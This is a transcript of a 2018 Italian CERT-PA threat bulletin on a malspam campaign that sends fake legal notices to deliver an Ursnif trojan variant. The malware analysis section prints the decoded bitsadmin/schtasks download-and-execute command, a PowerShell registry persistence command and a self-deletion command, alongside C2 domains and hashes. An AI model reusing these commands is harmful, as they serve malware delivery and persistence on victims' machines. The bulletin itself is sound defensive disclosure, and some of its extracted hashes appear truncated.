Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif -

Transcript

1 Massiva campagna di malspam Italiana con finti riferimenti a sentenze e contenuti giuridici - Variante del trojan bancario Ursnif - ID: CERT-PA-B Data: 08/08/2018 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevati dal CERT-PA, al fine di consentire loro di avviare tempestivamente valutazioni di impatto sui propri sistemi implementare le misure di contrasto/contenimento dei rischi correlati. informativi e Il CERT-PA, nell erogare al meglio questo servizio, si avvale di propri fornitori e di fonti pubbliche disponibili in Rete, individuati e selezionati tra i più autorevoli organismi di sicurezza, aziende specializzate e fornitori di tecnologie, al fine di garantire alla comunità di riferimento con la massima accuratezza, affidabilità e tempestività possibile le informazioni utili per la prevenzione e la gestione degli incidenti di sicurezza informatica. Non è consentito far uso di queste informazioni per finalità differenti da quelle sopra indicate. La presenza di rinvii operati mediante tecniche di ipertesto (link) non costituisce una raccomandazione del CERT-PA verso il soggetto richiamato, ma unicamente uno strumento per facilitare il rapido recupero di informazioni utili.

2 Indice Sommario Campagna di malspam Italiana con finti riferimenti e contenuti giuridici... 2 Esempi di veicolate... 3 Catena di infezione... 4 Analisi malware... 6 Indicatori di compromissione Misure di prevenzione e contrasto Conclusioni CERT-PA-B

3 Sommario Questa sezione contiene l elenco delle minacce oggetto del bollettino. Dalle segnalazioni e dal monitoraggio delle fonti, il CERT-PA ha evidenziato le seguenti minacce: 1. Campagna di malspam Italiana con finti riferimenti e contenuti giuridici A partire dal primo giorno di Agosto 2018, il CERT-PA ha rilevato una campagna di malspam rivolta verso utenze italiane ed, in particolare, verso caselle su domini di posta riferibili a strutture della PP.AA. Dal monitoraggio degli eventi connessi alla campagna e dalle analisi svolte sui campioni, direttamente o meno pervenuti, sono emerse evidenze tali da ritenere tale campagna tra le più vaste osservate, meticolosamente realizzate e pianificate quindi, almeno stando all utimo periodo, rilevanti in termini generali di pericolosità. La modalità di distribuzione ha coinvolto, nel giro di più giorni, non meglio specificate e quantificate caselle di destinazione, con modalità che variano di caso in caso. La finalità degli autori è quella di utilizzare una finta comunicazione, personalizzata e di natura legale, sperando di far presa su malcapitati utenti quindi riuscire a compromettere il sistema operativo installando una variante del trojan bancario Ursnif. Considerati alcuni elementi emersi nel corso delle indagini, tra cui la modalità di attuazione della campagna di malspam, la caratteristica catena di infezione adottata e le specifiche del malware, è plausibile supporre che l intento ultimo degli autori non abbia finalità strettamente, o unicamente, legate alla logica di utilizzo nativa di Ursnif. CERT-PA-B

4 Esempi di veicolate Di seguito, a titolo di esempio, si riportano alcuni dei principali messaggi rilevati a partire dal giorno 1 agosto 2018: CERT-PA-B

5 In tutti i casi osservati l utente destinatario riceve un testo apparentemente inviato da un fantomatico legale. Il messaggio invita, facendo leva sull oggetto e sul contenuto della , a visualizzare dei documenti in riferimento ad ipotetici atti o sentenze che sono resi disponibili tramite un collegamento internet. Il testo dei messaggi è, per lo più, correttamente scritto in italiano e riporta indicazioni di contesto non veritiere, tra cui la locazione dell avvocato scrivente e un numero di partita IVA che, da verifica a campione, non risulta associato ad alcuna entità reale. Altra caratteristica comune è che i messaggi vengono inviati singolarmente in modo da personalizzare la comunicazione. Gli autori della campagna infatti, tramite un inusuale dicitura d invito ad instaurare una comunicazione tra le parti, riportano, nel corpo del messaggio, la casella di posta del destinatario. Dalle casistiche monitorate la campagna in oggetto ha coinvolto sia utenze di posta elettronica ordinaria che quella di posta certificata, ove queste ultime siano abilitate alla ricezione di messaggi da caselle non C. Catena di infezione La catena di infezione può essere avviata solo tramite l interazione dell utente che, dando seguito all apertura del collegamento internet, acconsente allo scaricamento locale di un file archivio in formato zip. Il download dell'allegato avviene previo controllo dello user agent solo se la richiesta HTTP proviene da sistemi operativi basati su Microsoft Windows. Tentando l'apertura del collegamento da sistemi operativi differenti si otterrà una pagina web, apparentemente vuota, contenente un solo carattere speciale come di seguito raffigurato: Dalle analisi effettuate, su un numero cospicuo di casi, il CERT-PA ha identificato che, tramite la campagna, vengono diffusi tre differenti archivi denominati: Nuovo doc1.zip Nuovo doc2.zip Nuovo doc3.zip CERT-PA-B

6 I file archivio scaricati, pur utilizzando la stessa nomenclatura variano nel contenuto di volta in volta, ed in tutti i casi verificati l archivio scaricato contiene: un file immagine.jpg con nomi variabili, avente scopo di diversivo, e contenente riferimenti generici di un documento informatico artt. 20 e 21 un file malevolo con estensione.vbs che, se eseguito, è incaricato di avviare la catena di infezione. Di seguito l immagine del contenuto dell archivio Nuovo doc3.zip : Di seguito il contenuto del file immagine: CERT-PA-B

7 Analisi malware Osservando le varie fasi della catena di infezione, il CERT-PA ha provveduto ad analizzare le componenti malevole scaricate dal malware. Facendo distinzione tra tre casi di seguito indicati, si riporta il contenuto dell analisi svolta. Caso 1 Nome file: Nuovo doc1.vbs : fe c599631a697df99c5cf2ae9 SHA1: c eced61e4adb f5 Caso 2 : fc374f10e21986ceba020bdcc f7e18b429984e47fe3b Analisi Infosec: Nome file: Nuovo doc2.vbs : 8e7ebcbe0d1659d6e5b9ce9ee419727f SHA1: ea311e86b94391d11682d66371ab95a Caso3 : c544bf4d2d44c6807ad93ebc9feb2bc1c67474d4f8ef5c7d783113a0c75a1 Analisi Infosec: Nome file: Nuovo doc3.vbs : ac975eb0234f4d77903e91b8f SHA1: 13ee23fd9bdd73a358b4d835a4a723fb54658f83 : e8e9e2b14f621e4605d af590aa4c967d04fb05c323c be272 Analisi Infosec: Partendo dall'analisi di quest ultimo codice VBScript è emerso che il file VBS, una volta decodificato, provvede a lanciare il comando seguente: "cmd.exe /c bitsadmin /transfer msd5 /priority foreground %TEMP%/pwwnYfCXsO.exe &schtasks /create /st 10:11:10:11 /sc once /tn srx3 /tr %TEMP%/pwwnYfCXsO.exe Il comando avvia "bitsadmin" il quale provvede a scaricare localmente il file "pwwnyfcxso.exe" dalla risorsa " quindi fornisce parametri al processo di Windows "schtasks.exe" per programmare temporalmente l'esecuzione del file malevolo di seguito caratterizzato: CERT-PA-B

8 Nome file: pwwnyfcxso.exe : a6a67a19f7088a7dcabcffec3f9efdb4 SHA1: 7f3e58b7076c4df30e3db48e1b4a89eb4c7e237a : 7a17fd961eba4607e333c6d33d7db4bcd2019c353626f43a49231df00f6f408a Import hash: b274db88bb28fec6c04116af2b3c2263 Analisi Infosec: Di seguito una rappresentazione grafica dei processi invocati dal file.vbs: Da aggiuntive analisi sul file è emerso un ulteriore file integrato al precedente con una tecnica simile al "process hollowing" e di cui si riportano i dettagli: Nome file: payload_dump.exe : b32c067e2dec033cfc9a92c2a SHA1: fc54565f0b195bea36db7ef3e0f979b3618aad81 : fd615d82e c305cd0d9c57bed6fb7e771c3b05019d9c1f13b Import hash: c28444ce e29e35265dea61cc Analisi Infosec: NOTA: Tramite ricerche di tipo CLOSINT emerge che in relazione agli import hash sopra indicati emergono recenti "sample" associati alle tipologie di malware Ursnif e GandCrab. Dall analisi del malware risulta che, una volta decifrati i propri dati, è in grado di cambiare le impostazioni di Internet Explorer affinché non mostri finestre di benvenuto e di conferma al download dei file. In questo modo il malware può scaricare file senza essere notato dall utente. Il malware raccoglie informazioni come il nome utente e il tempo dall'avvio della macchina, queste sono poi trasformate in una query HTTP; di seguito un esempio ottenuto dalla macchina di analisi: soft=3&version=217016&user=d8a80f0c c66de827b &server=12&id=1345&crc=1&uptime=86236 Questa stringa, dopo minori manipolazioni, è poi codificata con un algoritmo ed usata per generare l'url da scaricare dei componenti aggiuntivi. Sono effettuate in totale tre richieste. Di seguito un esempio: CERT-PA-B

9 razizhe/uosufowutnnr/nbzp8yyhp9e/ot1n_2ffnczjt9/g84imohunegreffn3q5ti/1z4x1otbrk3av6nu/bhg3wome n9kah3r/jvjpprc8ec6rw0_2f/lcggjc.avi Ognuna di queste richieste scarica un file con estensione AVI ma il cui contenuto è un blob binario codificato in base64, una volta decodificati essi sono stati identificati come: una DLL a 32 bit, la stessa DLL compilata a 64 bit e uno script PowerShell. La DLL corrispondente alla versione del sistema operativo in uso viene modifica per essere iniettata in un processo ospite, lo script PowerShell viene alterato per inserirvi la DLL così modificata. Il malware genera due stringhe casuali a partire dai nomi delle librerie presenti nel sistema ed utilizza tali nomi per creare le chiavi di registro: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\<StringaCasuale> HKCU\Software\AppDataLow\Software\Microsoft\<GUIDCasuale>\<StringaCasuale> HKCU\Software\AppDataLow\Software\Microsoft\< GUIDCasuale>\Client32 HKCU\Software\AppDataLow\Software\Microsoft\< GUIDCasuale>\Client64 Le ultime due chiavi contengono i payload scaricati in formato cifrato, la seconda contiene lo script PowerShell modificato. La prima è il metodo di persistenza usato dal malware, essa contiene il comando: cmd.exe /C powershell invoke-expression([system.text.encoding]::ascii.getstring((get-itemproperty 'HKCU:\\Software\\AppDataLow\\Software\\Microsoft\\<GUIDCasuale>').<StringaCasuale>)) Infine, il malware cancella se stesso con il comando ping localhost -n 10 && del {percorso_malware} e termina. La catena di infezione prosegue al riavvio della macchina, il comando sopra porta all esecuzione di codice PowerShell che inietta la DLL scaricata nel processo padre (in questo caso explorer.exe). L analisi di questa DLL ha rilevato che il malware utilizza, per salvare i propri dati, la cartella di registro: HKCU\Software\AppDataLow\Software\Microsoft\ E utilizzato, ma non necessariamente creato, un numero consistente di sotto chiavi (Come Vars, Files, Run, Config, Src e GUID casuali) per cui la presenza di queste è un forte indicatore di compromissione. Il malware crea vari Thread di esecuzione ognuno finalizzato alla continua cattura di informazioni: vengono enumerati gli account di Outlook, gli account dei prodotti Mozilla (Firefox, Thunderbird, ), vengono CERT-PA-B

10 registrati i dispositivi rimovibili inseriti nel computer, viene infettato Chrome, viene installato un keylogger, viene recuperato l indirizzo IP esterno e vengono contattati i seguenti domini: Bradisdns.ru Pabertam.com Pool.erinwolfedoyle.com Next.gardenforyou.org Updomo.com Bizinua.com Utilizzando query HTTP GET con formato identico a quello descritto precedentemente ma con l aggiunta del parametro ip. CERT-PA-B

11 Indicatori di compromissione Di seguito si riportano gli indicatori rilevati dalle dirette osservazioni ed analisi oltre a quelli ad essi associabili Indicatori di compromissione Domini mittente utilizzati saybees.com sfdscf.com dasayf.com sfsheriffactivityleague.com Drop URL univoche identificate IoC Malware URL download payload Domini C&C bradisdns.ru pabertam.com pool.erinwolfedoly.com next.gardenforyou.org updomo.com bizinua.com CERT-PA-B

12 IP C&C 195[.] IoC Malware associati a quelli rilevati nella campagna descritta. Malware Ursnif associato all'ip 195[.] : Data rilevamento 08/07/ f4594b3a72779c6f5fc008a4fdf8e2ffa151c88dd94cb91415b6f4b13e874 aa50bc7ff7ab6cfcfdb89bb8a981c434 Data rilevamento 08/07/2018 2ba41081e00f48e19e0a7f1240e80f5334eeed43aa56f3da14334b210ac4ab4d e3c71d05a cdbd7e1b3f5df03 Data rilevamento 08/03/2018 cfba4172e6c5ad06ad84ae093ae97deb6d35f0fc9b72b02e7357a6b7a5685da5 c3ce3a7a9ecf94cea45a3e402f871d8b Data rilevamento 08/03/ f08bd14a a5eb9df9e6010dc1d939e0e5c754a301a6b015e0a8ed74e 3a b46ae2e6400d8e22e4129d Malware Ursnif associato al dominio bradisdns.ru: Data rilevamento 08/07/ f4594b3a72779c6f5fc008a4fdf8e2ffa151c88dd94cb91415b6f4b13e874 aa50bc7ff7ab6cfcfdb89bb8a981c434 Data rilevamento 08/07/2018 2ba41081e00f48e19e0a7f1240e80f5334eeed43aa56f3da14334b210ac4ab4d e3c71d05a cdbd7e1b3f5df03 Data rilevamento 08/03/2018 cfba4172e6c5ad06ad84ae093ae97deb6d35f0fc9b72b02e7357a6b7a5685da5 c3ce3a7a9ecf94cea45a3e402f871d8b CERT-PA-B

13 Data rilevamento 08/03/ f08bd14a a5eb9df9e6010dc1d939e0e5c754a301a6b015e0a8ed74e 3a b46ae2e6400d8e22e4129d Data rilevamento 08/02/ d cbf60a8c2daba404499b68e75186f088d4a89cb308e d2c3 d59b3d bf277684c42fcc69 Data rilevamento 08/02/ c479303cf eb6b95a0989aa1f4cfa21cf706d02e bb0d1 a0e4a9c661a9a45cfb6e6abb4ad36723 Data rilevamento 08/02/2018 b879cd e41807eef3c b3db08b5e5741ca8dc4e442bc2 8e9c012abec8bb7e76114e608eada3e1 Data rilevamento 08/02/2018 3cab9ffb906e622d8b7a56b10def16e6feffa2f6a c0fa7b8f764674a 630d6a3528f654c852cb84a5e Data rilevamento 08/02/ ecfdce4524d821ec2a83e32cead0fd8a783814cfd2921d0d915e64c113bba5 07e9cb7f5bd6ba001c21ebf1baeb9eaa Malware di varie tipologie associato all'import Hash b274db88bb28fec6c04116af2b3c2263 Data rilevamento 08/06/2018 a54609ed775fab ce17aa4d68675bb35af0012d361ffcb4bbb249e5a e46eaf49e5b00b54dde42879ebbd1ffb Data rilevamento 08/04/2018 bcda43d2010b44a8cb1a271eb6b02d0043c453f3d393868fbdbe214f8c7b5039 2a48174d48bec54c734230bdb4c44dba CERT-PA-B

14 Data rilevamento 08/03/ ec58795aaed0e4fe6a3fbb8031d9ba7c3899d5d80e1241ecd68ccf3b300 d071449bec f1b9b0a87d1def8 Data rilevamento 08/03/ b6014a444db1208e41ef17b3a739b659eeaa8e493f135f62e90673a1cfc555 29e30c4aa7ff023046d920aef9d85233 Data rilevamento 08/03/ b6014a444db1208e41ef17b3a739b659eeaa8e493f135f62e90673a1cfc555 29e30c4aa7ff023046d920aef9d85233 Data rilevamento 08/03/2018 1baaa425c2a3e35df5dbc164863abbe7fc92110ccea887f245ae4bd7a6b351c0 b78f5fc367d6103a033e829c3d38ea1c Malware di varie tipologie associato all'import Hash c28444ce e29e35265dea61cc Data rilevamento 08/03/2018 cfba4172e6c5ad06ad84ae093ae97deb6d35f0fc9b72b02e7357a6b7a5685da5 c3ce3a7a9ecf94cea45a3e402f871d8b Data rilevamento 07/30/2018 d2b9c0f765f12c400157ace2c38e013ac915e7824beb230e1dc9725d2fe25d45 1a78b23a8d09d0115f9f46ef92a20c76 Data rilevamento 07/30/ b468f21f c80f6a3ea16a60a1d179c97268c72433c3a28e75 f09fed26c29c4d491a4306bb42fc4b4f CERT-PA-B

15 Misure di prevenzione e contrasto Il fattore di rilevamento dei file.vbs, rilevanti durante l esercizio della campagna, è pressochè nullo da parte degli antivirus. Inoltre i sistemi di sicurezza potrebbero non identificare i carichi malevoli (payload) che vengono scaricati dal client per mezzo dei domini utilizzati nell infrastruttura network della campagna. Non si hanno dirette evidenze relativamente alla capacità, da parte del malware analizzato, di contattare le risorse esterne, quali il server di C&C, tramite un server proxy. Dalle analisi svolte, in relazione a funzioni rilevate allo scopo di identificare la configurazione di IE, riteniamo comunque possibile tale circostanza. I domini utilizzati dagli autori della campagna per scaricare l'archivio zip (drop url) non sono, nel recente passato, stati utilizzati in ulteriori eventi di diffusione malware e, nella maggior parte dei casi, non sono categorizzati (web reputation). Trattandosi di una campagna di malspam estremamente variabile in relazione alla casella mittente, oggetto, corpo del messaggio, drop url e del file.vbs, le misure di contrasto possono essere applicate in base alle possibilità offerte dalle tecnologie di sicurezza in uso. In generale si consiglia: 1. lato server di posta Attivare un filtro per i domini mittente indicati e/o filtrare i messaggi in arrivo che contengano nell oggetto la dicitura "Relata notifica decreto", "Relazione di notifica sentenza", "Relazione notifica decreto", "Relata di notifica decreto" 2. lato client e policy AD Una soluzione ove possibile valida contro la diffusione del malware, non legata alle firme Antivirus, è quella di bloccare il traffico in uscita del processo "bitsadmin.exe" verso destinazioni internet non note. Ulteriori suggerimenti, da valutare lato end-point, richiamano all'attuazione di specifiche politiche di controllo e restrizioni sulle funzionalità di Windows tra cui: Criteri di restrizione software (applicabile a Windows 8 e 8.1, Windows Server 2012 R2 e 2012) Windows AppLocker (applicabile a Windows 7 e Windows Server 2008 R2) CERT-PA-B

16 Conclusioni La campagna indicata, in ordine a quelle notate nel corso degli ultimi mesi a danno di utenze Italiane, utilizza importanti risorse e più sofisticate tecniche per colpire i destinatari. Analisi indirizzate ad identificare se le caselle coivolte fossero esposte in dump noti non hanno dato esito positivo. Dagli elementi raccolti è plausibile ritenere che tale malware possa essere diffuso con l intento di infettare, più o meno, specifici bersagli e condurre ulteriori azioni che potrebbero non essere strettamente legate alle caratteristiche del malware bancario Ursnif, ma utilizzarne le spefiche funzionalità, per attività malevole ad ampio spettro. Dalle ultime evidenze dirette raccolte dal CERT-PA, gli eventi risalgono al pomeriggio di ieri, 7 agosto 2018, pertanto riteniamo che la campagna sia ancora in corso. Si prega di fornire risconto al CERT-PA (cert-pa@cert-pa.it con riferimento al codice CERT-PA-B del bollettino) in caso di rilevazione degli indicatori di compromissione indicati o se la campagna risultasse in atto verso i Vs domini di riferimento. Analisi sul malware ed indagini sul caso sono in corso, il CERT-PA fornirà aggiornamenti qualora rilevate informazioni rilevanti. CERT-PA-B